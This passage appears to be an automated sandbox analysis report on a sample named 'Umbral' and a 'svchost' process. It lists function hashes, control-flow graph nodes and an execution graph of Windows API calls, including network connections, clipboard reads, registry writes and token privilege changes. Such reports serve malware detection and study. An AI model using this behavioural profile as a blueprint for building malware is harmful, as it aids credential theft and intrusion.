                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 649fdc90bff00e6ecf08d7940de0922aa979d8878b2df158134d671970afc2db
                                                                        • Instruction ID: aa76fda009e2d65284d4a598a068d27f276889723f939867b470672322eea37e
                                                                        • Opcode Fuzzy Hash: 649fdc90bff00e6ecf08d7940de0922aa979d8878b2df158134d671970afc2db
                                                                        • Instruction Fuzzy Hash: 0B11B942A0F6AA4FE76157FC1C756A16F91DF0E940B0D41F6D889C71A3DA0CBA098692
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B0E45 Relevance: .1, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0b7f23b49187a56888bd46bac74c642d8c8ff16502c0e484602993984425f828
                                                                        • Instruction ID: b928314430dc6d19c0ef9ef27d1784e1393933924175c85d95b3c0ae258d27d3
                                                                        • Opcode Fuzzy Hash: 0b7f23b49187a56888bd46bac74c642d8c8ff16502c0e484602993984425f828
                                                                        • Instruction Fuzzy Hash: BF014E50A0D6882FE31862790C2B9FA3BD5CF56110F0501BEF885C31E3EC5978074292
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B426F Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 63fa27ba919d8271c5cdeaa2291aa4280078dc1562413e5b231f93167f413b21
                                                                        • Instruction ID: 8ea9f2227120e45f1129abc76855f9a2c1d442e9656f5170133a76b1562b8cc5
                                                                        • Opcode Fuzzy Hash: 63fa27ba919d8271c5cdeaa2291aa4280078dc1562413e5b231f93167f413b21
                                                                        • Instruction Fuzzy Hash: 39014E32A0E94E4BDF149B969C511D57794FF88324F08067EE41CC3191D7655555CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B413C Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 46fd348b172ac3fc8f7ab3f1eb7d70e4851a5b50e15a3e0e7d97c8c07259f987
                                                                        • Instruction ID: 63d44232f59d1e8bd337e498f67bc9d894301f9c5a677c7da7b58e48c0a58421
                                                                        • Opcode Fuzzy Hash: 46fd348b172ac3fc8f7ab3f1eb7d70e4851a5b50e15a3e0e7d97c8c07259f987
                                                                        • Instruction Fuzzy Hash: D7015230F1854E8FEF98DF54C4A16BA73A2FFA8310F148139D41AD3299CA34E8428B80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B2EC0 Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b9d5ddf3c8c63e934a5d42a17ceeaeb17c692cb33e3fe01858f395e0b2fe2465
                                                                        • Instruction ID: a0fb70a9b1d49e1ecf5024d481dea2e12125a87874b7bcb91f24c9e3bcee69a3
                                                                        • Opcode Fuzzy Hash: b9d5ddf3c8c63e934a5d42a17ceeaeb17c692cb33e3fe01858f395e0b2fe2465
                                                                        • Instruction Fuzzy Hash: 8A018460B2CB404BD3086B6CAC66679B7D1EF89700F10057EF48EC32D7CE28A8468687
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B17E9 Relevance: .0, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 60b6dab33da0da43a72caac06b78061b7680c35e04d3be5dbfdbf260d3513854
                                                                        • Instruction ID: 08de8a781f6000ba2ab6a2c72e490cc53327c3d13152f52bb0ee9b821af4d479
                                                                        • Opcode Fuzzy Hash: 60b6dab33da0da43a72caac06b78061b7680c35e04d3be5dbfdbf260d3513854
                                                                        • Instruction Fuzzy Hash: 95018F3161DB9D5FC795D728D4605E6BFE1EF89320F4505BEE489C72A2CA249A408B82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B0E10 Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c7d32031d1c40af64c71b16e66dba8a42b69994c3bd346efc313ec6905eb69a2
                                                                        • Instruction ID: e3069c4224bd5038d1a2582a78129a587abcac45faf1e3d80e25fc5a56d6426c
                                                                        • Opcode Fuzzy Hash: c7d32031d1c40af64c71b16e66dba8a42b69994c3bd346efc313ec6905eb69a2
                                                                        • Instruction Fuzzy Hash: 4DF0F43261DB5D4BC798D728D4246AA77D1FFD8350F80053EF04AD33A0CE24A9408BC1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B1A80 Relevance: .0, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a642d0f452fcde93b71f724ae0739d98862bf86944346702b8adef831db93090
                                                                        • Instruction ID: 074ab5e42d2618cdb0633630df2ea779467790c1fcfce18d284befb563d3177a
                                                                        • Opcode Fuzzy Hash: a642d0f452fcde93b71f724ae0739d98862bf86944346702b8adef831db93090
                                                                        • Instruction Fuzzy Hash: 06E06871A1DB4C4BDF50AB69A8206D97BA0EF88354F041069E01CC6280D6216950C781
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B09AD Relevance: .0, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8dd8afe20182e2e00fc423225ba19dbe54075361b7557b49a0105684619caf0f
                                                                        • Instruction ID: 5a2d6182f29c775c81590a288c9c871d39961328df80b0247519c00027dd74c1
                                                                        • Opcode Fuzzy Hash: 8dd8afe20182e2e00fc423225ba19dbe54075361b7557b49a0105684619caf0f
                                                                        • Instruction Fuzzy Hash: AFE0C221F5581E49EB18B3B43C369FDB285DF89204FD10871E02DC30CBDD1929160582
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B0CFD Relevance: .0, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ca7e03bec7e27f4074c47fd9324abd2f3073fd8e0d5e8173843bdf4450da25d6
                                                                        • Instruction ID: e7648f83020b2ae07bc4617f0bbc2618abe7a178ea4ddf15bd94d691b243c981
                                                                        • Opcode Fuzzy Hash: ca7e03bec7e27f4074c47fd9324abd2f3073fd8e0d5e8173843bdf4450da25d6
                                                                        • Instruction Fuzzy Hash: A9E0C221FA581E49EB48B3B43C36DFDB245DF89200BD10871E01DC30CBDD1925120982
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B08FE Relevance: .0, Instructions: 17COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cd09f51854707422b86532ea878309582ddd9fc03b195041f3247f132d49a423
                                                                        • Instruction ID: f2cd014a85e72f6a2dea513f7ddfcb62a5db4d9c3c63a0f32b1a2ecb73bfb3ba
                                                                        • Opcode Fuzzy Hash: cd09f51854707422b86532ea878309582ddd9fc03b195041f3247f132d49a423
                                                                        • Instruction Fuzzy Hash: C8D0123251C7094BC3189B54E8108DAB7A0FB88368F400B39E0AA921E5DB6893818682
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B0C57 Relevance: .0, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0cc05306a0b74d1c143da79fb36555894d460db5069e76af17ee186b7b63c356
                                                                        • Instruction ID: e658f0e5d73430030b4821fa79b39762d21464fcd2406978e748759befc5eb7b
                                                                        • Opcode Fuzzy Hash: 0cc05306a0b74d1c143da79fb36555894d460db5069e76af17ee186b7b63c356
                                                                        • Instruction Fuzzy Hash: 3CD05E3192CB0A4BD344DF14E8508DAB7A0FF84720F800B2DF06E961E5DF7892818A82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B3F43 Relevance: .0, Instructions: 13COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7367bb3e56805058811ed18011b42ca60da0b0a68c880dfdf1c3a814161ddf3c
                                                                        • Instruction ID: c97aad285fab793015d34f53434dfbaed3b62e1244f7d45e4031c8017c71be3c
                                                                        • Opcode Fuzzy Hash: 7367bb3e56805058811ed18011b42ca60da0b0a68c880dfdf1c3a814161ddf3c
                                                                        • Instruction Fuzzy Hash: 8FC0123252C94A57D345BB50E8518EBB351BF94210F801F3AF05A8209ADD5866448582
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 00007FFD9B8B0798 Relevance: 5.1, Strings: 4, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: L_^0$L_^2$L_^4$L_^6
                                                                        • API String ID: 0-2047270763
                                                                        • Opcode ID: d521dd6c2950acf4d8899c8af344b590bae43599b27f4904fdbe7f62bc7c4d6a
                                                                        • Instruction ID: 8d4f3299349d7c0354a0aaedfee9f8f9c893c731bc05d3966e0733fe7577c318
                                                                        • Opcode Fuzzy Hash: d521dd6c2950acf4d8899c8af344b590bae43599b27f4904fdbe7f62bc7c4d6a
                                                                        • Instruction Fuzzy Hash: 1C118CF390E1988BD3122BB95C641ECBB90EF00728B2456FBC0E447167EA1172878B89
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B0728 Relevance: 5.0, Strings: 4, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.1700741026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_Umbral.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: L_^0$L_^2$L_^4$L_^6
                                                                        • API String ID: 0-2047270763
                                                                        • Opcode ID: 2b0c131fdda38f2779053ae3419561cd56c997028f77755eee68f077a814716d
                                                                        • Instruction ID: 1a2f243e62928eb15b898fba6260019516ceaa18decf5acc90fdb7375ee6f3ac
                                                                        • Opcode Fuzzy Hash: 2b0c131fdda38f2779053ae3419561cd56c997028f77755eee68f077a814716d
                                                                        • Instruction Fuzzy Hash: D7B0025351907240930E756879664E45751CF0513D74C45F3D0DD090D77C4534875184
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:21.9%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:3.2%
                                                                        Total number of Nodes:95
                                                                        Total number of Limit Nodes:5
                                                                        execution_graph 8144 33bb73a 8145 33bb769 WaitForInputIdle 8144->8145 8146 33bb79f 8144->8146 8147 33bb777 8145->8147 8146->8145 8226 6530a16 8227 6530a4e ConvertStringSecurityDescriptorToSecurityDescriptorW 8226->8227 8229 6530a8f 8227->8229 8230 33bb4f6 8231 33bb531 SendMessageTimeoutA 8230->8231 8233 33bb579 8231->8233 8234 653121e 8236 6531259 getaddrinfo 8234->8236 8237 65312cb 8236->8237 8238 653219e 8239 65321d3 ioctlsocket 8238->8239 8241 65321ff 8239->8241 8242 33bac6a 8243 33bac9f GetFileType 8242->8243 8245 33baccc 8243->8245 8246 33bb06a 8247 33bb0a2 CreateMutexW 8246->8247 8249 33bb0e5 8247->8249 8155 33baeae 8158 33baee3 ReadFile 8155->8158 8157 33baf15 8158->8157 8159 33ba72e 8160 33ba77e OleGetClipboard 8159->8160 8161 33ba78c 8160->8161 8162 6530bc6 8164 6530bfe MapViewOfFile 8162->8164 8165 6530c4d 8164->8165 8166 653264a 8167 653267f GetExitCodeProcess 8166->8167 8169 65326a8 8167->8169 8250 653280a 8252 653283f SetProcessWorkingSetSize 8250->8252 8253 653286b 8252->8253 8170 33baaa6 8171 33baade CreateFileW 8170->8171 8173 33bab2d 8171->8173 8174 6531fce 8175 6532006 RegCreateKeyExW 8174->8175 8177 6532078 8175->8177 8178 65324ce 8179 65324fd AdjustTokenPrivileges 8178->8179 8181 653251f 8179->8181 8182 653234e 8183 6532377 LookupPrivilegeValueW 8182->8183 8185 653239e 8183->8185 8186 33bb31a 8188 33bb34f RegQueryValueExW 8186->8188 8189 33bb3a3 8188->8189 8190 33ba59a 8191 33ba5d8 DuplicateHandle 8190->8191 8192 33ba610 8190->8192 8193 33ba5e6 8191->8193 8192->8191 8194 6530572 8196 65305aa WSASocketW 8194->8196 8197 65305e6 8196->8197 8254 6531132 8256 6531167 GetProcessTimes 8254->8256 8257 6531199 8256->8257 8258 33ba65e 8259 33ba68a FindCloseChangeNotification 8258->8259 8261 33ba6c0 8258->8261 8260 33ba698 8259->8260 8261->8259 8198 653227a 8200 65322a3 select 8198->8200 8201 65322d8 8200->8201 8202 33baa12 8203 33baa3e SetErrorMode 8202->8203 8205 33baa67 8202->8205 8204 33baa53 8203->8204 8205->8203 8206 33bb212 8207 33bb24a RegOpenKeyExW 8206->8207 8209 33bb2a0 8207->8209 8210 65313fe 8212 6531433 WSAConnect 8210->8212 8213 6531452 8212->8213 8214 33bb40e 8216 33bb443 RegSetValueExW 8214->8216 8217 33bb48f 8216->8217 8262 6532726 8264 653275b GetProcessWorkingSetSize 8262->8264 8265 6532787 8264->8265 8218 6530e6a 8221 6530e9f shutdown 8218->8221 8220 6530ec8 8221->8220 8266 65316aa 8269 65316e5 LoadLibraryA 8266->8269 8268 6531722 8269->8268 8222 33ba186 8223 33ba1bb send 8222->8223 8224 33ba1f3 8222->8224 8225 33ba1c9 8223->8225 8224->8223

                                                                        Executed Functions

                                                                        Function 05CC4298 Relevance: 5.7, Strings: 3, Instructions: 1950COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 5cc4298-5cc42c9 3 5cc42ca-5cc4350 0->3 4 5cc4352-5cc435a 0->4 3->4 32 5cc435c 3->32 5 5cc4366-5cc437a 4->5 6 5cc452f-5cc467d 5->6 7 5cc4380-5cc43bc 5->7 44 5cc480d-5cc4821 6->44 45 5cc4683-5cc47d2 6->45 19 5cc43ed-5cc44ef 7->19 20 5cc43be-5cc43e6 7->20 19->6 20->19 32->5 47 5cc496f-5cc4983 44->47 48 5cc4827-5cc4934 44->48 45->44 50 5cc4985-5cc498b call 5cc4210 47->50 51 5cc49d6-5cc49ea 47->51 48->47 57 5cc4990-5cc499b 50->57 54 5cc49ec-5cc49f7 51->54 55 5cc4a32-5cc4a46 51->55 54->55 59 5cc4a4c-5cc4b59 55->59 60 5cc4b94-5cc4ba8 55->60 57->51 59->60 63 5cc4bae-5cc4bc2 60->63 64 5cc4cd4-5cc4ce8 60->64 68 5cc4bc4-5cc4bcb 63->68 69 5cc4bd0-5cc4be4 63->69 72 5cc4cee-5cc4f2d 64->72 73 5cc4f74-5cc4f88 64->73 75 5cc4c48-5cc4c5c 68->75 76 5cc4bef-5cc4c03 69->76 77 5cc4be6-5cc4bed 69->77 72->73 78 5cc4f8a-5cc4f9b 73->78 79 5cc4fe2-5cc4ff6 73->79 83 5cc4c5e-5cc4c74 75->83 84 5cc4c76-5cc4c82 75->84 85 5cc4c0e-5cc4c22 76->85 86 5cc4c05-5cc4c0c 76->86 77->75 78->79 81 5cc4ff8-5cc4ffe 79->81 82 5cc5045-5cc5059 79->82 81->82 92 5cc505b 82->92 93 5cc50a2-5cc50b6 82->93 91 5cc4c8d 83->91 84->91 95 5cc4c2d-5cc4c41 85->95 96 5cc4c24-5cc4c2b 85->96 86->75 91->64 92->93 101 5cc512d-5cc5141 93->101 102 5cc50b8-5cc50e1 93->102 95->75 97 5cc4c43-5cc4c45 95->97 96->75 97->75 107 5cc53b4-5cc53c8 101->107 108 5cc5147-5cc5363 101->108 102->101 115 5cc549e-5cc54b2 107->115 116 5cc53ce-5cc5457 107->116 492 5cc5365 108->492 493 5cc5367 108->493 119 5cc566f-5cc5683 115->119 120 5cc54b8-5cc5628 115->120 116->115 125 5cc5689-5cc579f 119->125 126 5cc57e6-5cc57fa 119->126 120->119 125->126 129 5cc595d-5cc5971 126->129 130 5cc5800-5cc5916 126->130 137 5cc5ad4-5cc5ae8 129->137 138 5cc5977-5cc5a8d 129->138 130->129 145 5cc5aee-5cc5c04 137->145 146 5cc5c4b-5cc5c5f 137->146 138->137 145->146 152 5cc5c65-5cc5d7b 146->152 153 5cc5dc2-5cc5dd6 146->153 152->153 158 5cc5ddc-5cc5ef2 153->158 159 5cc5f39-5cc5f4d 153->159 158->159 165 5cc60b0-5cc60c4 159->165 166 5cc5f53-5cc6069 159->166 180 5cc60ca-5cc61e0 165->180 181 5cc6227-5cc623b 165->181 166->165 180->181 189 5cc639e-5cc63b2 181->189 190 5cc6241-5cc6357 181->190 198 5cc63b8-5cc63fd call 5cc4278 189->198 199 5cc6536-5cc654a 189->199 190->189 321 5cc64bd-5cc64df 198->321 203 5cc668d-5cc66a1 199->203 204 5cc6550-5cc656f 199->204 216 5cc67ee-5cc6802 203->216 217 5cc66a7-5cc67a7 203->217 237 5cc6614-5cc6636 204->237 223 5cc694f-5cc6963 216->223 224 5cc6808-5cc6908 216->224 217->216 241 5cc6969-5cc6a69 223->241 242 5cc6ab0-5cc6ada 223->242 224->223 250 5cc663c 237->250 251 5cc6574-5cc6583 237->251 241->242 261 5cc6b9a-5cc6bae 242->261 262 5cc6ae0-5cc6b53 242->262 250->203 266 5cc663e 251->266 267 5cc6589-5cc65bc 251->267 278 5cc6c8b-5cc6c9f 261->278 279 5cc6bb4-5cc6c44 261->279 262->261 287 5cc6643-5cc668b 266->287 358 5cc65be-5cc65f8 267->358 359 5cc6603-5cc660c 267->359 285 5cc6de5-5cc6df9 278->285 286 5cc6ca5-5cc6d97 278->286 279->278 298 5cc705c-5cc7070 285->298 299 5cc6dff-5cc6e4f 285->299 529 5cc6d9e 286->529 287->203 308 5cc7158-5cc715f 298->308 309 5cc7076-5cc7111 call 5cc4278 * 2 298->309 417 5cc6ebd-5cc6ee8 299->417 418 5cc6e51-5cc6e77 299->418 309->308 335 5cc64e5 321->335 336 5cc6402-5cc6411 321->336 335->199 353 5cc64e7 336->353 354 5cc6417-5cc64b5 336->354 374 5cc64ec-5cc6534 353->374 354->374 487 5cc64b7 354->487 358->359 359->287 366 5cc660e 359->366 366->237 374->199 489 5cc6eee-5cc6fc1 417->489 490 5cc6fc6-5cc7057 417->490 494 5cc6eb8 418->494 495 5cc6e79-5cc6e99 418->495 487->321 489->298 490->298 500 5cc536d 492->500 493->500 494->298 495->494 500->107 529->285
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$\O(l$2(l
                                                                        • API String ID: 0-2507128402
                                                                        • Opcode ID: db25a7bd09ab0dcfbd76d8f6d1657400d670af3dedcfbf7600037a3ab9960c02
                                                                        • Instruction ID: bd103cf21f3fc3fe4e757cc0c2ddba95d95e7572f76a2c4b66dad6ed4ecb5bba
                                                                        • Opcode Fuzzy Hash: db25a7bd09ab0dcfbd76d8f6d1657400d670af3dedcfbf7600037a3ab9960c02
                                                                        • Instruction Fuzzy Hash: C5231774A052288FDB25DF24D994BE9B7B2FB58308F0041EAD909A7394DF395E86CF41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC4287 Relevance: 5.5, Strings: 3, Instructions: 1755COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 556 5cc4287-5cc4290 557 5cc42c4-5cc42c9 556->557 558 5cc4292-5cc42c2 556->558 560 5cc42ca-5cc4350 557->560 561 5cc4352-5cc435a 557->561 558->557 560->561 590 5cc435c 560->590 562 5cc4366-5cc437a 561->562 564 5cc452f-5cc467d 562->564 565 5cc4380-5cc43bc 562->565 602 5cc480d-5cc4821 564->602 603 5cc4683-5cc47d2 564->603 577 5cc43ed-5cc44ef 565->577 578 5cc43be-5cc43e6 565->578 577->564 578->577 590->562 605 5cc496f-5cc4983 602->605 606 5cc4827-5cc4934 602->606 603->602 608 5cc4985-5cc498b call 5cc4210 605->608 609 5cc49d6-5cc49ea 605->609 606->605 615 5cc4990-5cc499b 608->615 612 5cc49ec-5cc49f7 609->612 613 5cc4a32-5cc4a46 609->613 612->613 617 5cc4a4c-5cc4b59 613->617 618 5cc4b94-5cc4ba8 613->618 615->609 617->618 621 5cc4bae-5cc4bc2 618->621 622 5cc4cd4-5cc4ce8 618->622 626 5cc4bc4-5cc4bcb 621->626 627 5cc4bd0-5cc4be4 621->627 630 5cc4cee-5cc4f2d 622->630 631 5cc4f74-5cc4f88 622->631 633 5cc4c48-5cc4c5c 626->633 634 5cc4bef-5cc4c03 627->634 635 5cc4be6-5cc4bed 627->635 630->631 636 5cc4f8a-5cc4f9b 631->636 637 5cc4fe2-5cc4ff6 631->637 641 5cc4c5e-5cc4c74 633->641 642 5cc4c76-5cc4c82 633->642 643 5cc4c0e-5cc4c22 634->643 644 5cc4c05-5cc4c0c 634->644 635->633 636->637 639 5cc4ff8-5cc4ffe 637->639 640 5cc5045-5cc5059 637->640 639->640 650 5cc505b 640->650 651 5cc50a2-5cc50b6 640->651 649 5cc4c8d 641->649 642->649 653 5cc4c2d-5cc4c41 643->653 654 5cc4c24-5cc4c2b 643->654 644->633 649->622 650->651 659 5cc512d-5cc5141 651->659 660 5cc50b8-5cc50e1 651->660 653->633 655 5cc4c43-5cc4c45 653->655 654->633 655->633 665 5cc53b4-5cc53c8 659->665 666 5cc5147-5cc5363 659->666 660->659 673 5cc549e-5cc54b2 665->673 674 5cc53ce-5cc5457 665->674 1050 5cc5365 666->1050 1051 5cc5367 666->1051 677 5cc566f-5cc5683 673->677 678 5cc54b8-5cc5628 673->678 674->673 683 5cc5689-5cc579f 677->683 684 5cc57e6-5cc57fa 677->684 678->677 683->684 687 5cc595d-5cc5971 684->687 688 5cc5800-5cc5916 684->688 695 5cc5ad4-5cc5ae8 687->695 696 5cc5977-5cc5a8d 687->696 688->687 703 5cc5aee-5cc5c04 695->703 704 5cc5c4b-5cc5c5f 695->704 696->695 703->704 710 5cc5c65-5cc5d7b 704->710 711 5cc5dc2-5cc5dd6 704->711 710->711 716 5cc5ddc-5cc5ef2 711->716 717 5cc5f39-5cc5f4d 711->717 716->717 723 5cc60b0-5cc60c4 717->723 724 5cc5f53-5cc6069 717->724 738 5cc60ca-5cc61e0 723->738 739 5cc6227-5cc623b 723->739 724->723 738->739 747 5cc639e-5cc63b2 739->747 748 5cc6241-5cc6357 739->748 756 5cc63b8-5cc63fd call 5cc4278 747->756 757 5cc6536-5cc654a 747->757 748->747 879 5cc64bd-5cc64df 756->879 761 5cc668d-5cc66a1 757->761 762 5cc6550-5cc656f 757->762 774 5cc67ee-5cc6802 761->774 775 5cc66a7-5cc67a7 761->775 795 5cc6614-5cc6636 762->795 781 5cc694f-5cc6963 774->781 782 5cc6808-5cc6908 774->782 775->774 799 5cc6969-5cc6a69 781->799 800 5cc6ab0-5cc6ada 781->800 782->781 808 5cc663c 795->808 809 5cc6574-5cc6583 795->809 799->800 819 5cc6b9a-5cc6bae 800->819 820 5cc6ae0-5cc6b53 800->820 808->761 824 5cc663e 809->824 825 5cc6589-5cc65bc 809->825 836 5cc6c8b-5cc6c9f 819->836 837 5cc6bb4-5cc6c44 819->837 820->819 845 5cc6643-5cc668b 824->845 916 5cc65be-5cc65f8 825->916 917 5cc6603-5cc660c 825->917 843 5cc6de5-5cc6df9 836->843 844 5cc6ca5-5cc6d97 836->844 837->836 856 5cc705c-5cc7070 843->856 857 5cc6dff-5cc6e4f 843->857 1087 5cc6d9e 844->1087 845->761 866 5cc7158-5cc715f 856->866 867 5cc7076-5cc7111 call 5cc4278 * 2 856->867 975 5cc6ebd-5cc6ee8 857->975 976 5cc6e51-5cc6e77 857->976 867->866 893 5cc64e5 879->893 894 5cc6402-5cc6411 879->894 893->757 911 5cc64e7 894->911 912 5cc6417-5cc64b5 894->912 932 